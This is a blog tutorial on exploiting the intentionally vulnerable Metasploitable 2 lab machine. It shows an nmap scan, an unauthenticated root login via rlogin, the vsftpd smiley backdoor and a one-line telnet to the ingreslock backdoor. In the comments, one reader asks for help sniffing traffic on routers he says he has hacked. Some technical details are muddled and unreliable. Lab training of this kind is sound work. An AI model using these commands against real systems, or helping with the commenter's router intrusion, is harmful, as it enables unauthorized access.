Thursday, May 1, 2014

Metasploitable 2 : Vulnerability assessment and Remote Login

If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.


Portscan

On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24




The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).

Vulnerabilities

Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
  1. Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
  2. Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
  3. Weak Passwords - These are vulnerable to bruteforce attacks.
  4. Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
  5. Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.

Exploiting The Vulnerabilities

Remote access vulnerability - Rlogin

Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.


root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
           [-D [bind_address:]port] [-e escape_char] [-F configfile]
           [-I pkcs11] [-i identity_file]
           [-L [bind_address:]port:host:hostport]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-R [bind_address:]port:host:hostport] [-S ctl_path]
           [-W host:port] [-w local_tun[:remote_tun]]
           [user@]hostname [command] 
 
rlogin -l root 192.168.154.132
Most probably you will get something like this-

root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password: 

As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-client
This will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.



root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# 

Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.

Telnet Vulnerability

Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-
telnet 192.168.99.131 1524
This is a another one line exploit, on the 1524 ingreslock port (see portscan result). I will post more stuff soon, but this is all for now.

12 comments:

  1. Hi, found something to add.
    Users need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.

    ReplyDelete
    Replies
    1. Please elaborate. I didn't get you. Are you talking about the port-scan step?

      Delete
  2. Hi , i have hacked some routers (TP_Link and D_Link)...so i have full-complete access
    to the victim's router web interface....( my OS=Kali ) ....is there any way to sniff PC data traffic behind NAT???((except DNS Spoofing))......

    ReplyDelete
    Replies
    1. Web Interface is nice but yields little. You need to gain root access if you want to get anywhere,

      Delete
  3. where can i find the rest of your tutorials on this?

    ReplyDelete
  4. hii
    first amazing site love it
    and second i cant find any ports .
    my lp run kali and my pc run VM Metasploitable2
    i use nmap and get this >>>>
    note : host seems down , if it is really up , but blocking our ping probes , try -Pn ( i try it not working too)
    nmap done : 1 IP Address ( 0 host up ) .
    what i need to do ?
    thanks .

    ReplyDelete
    Replies
    1. you must ensure your metasploitable is up and running when scanning

      Delete
  5. Your metasploitable2 must be up and running when you are testing

    ReplyDelete
  6. scanning with nmap shows all ports are filtered. what should i do?

    ReplyDelete
    Replies
    1. turn off the firewall, or slow down the scan so firewall doesn't detect it. Also experiment with scan types

      Delete
  7. Hi,

    I followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC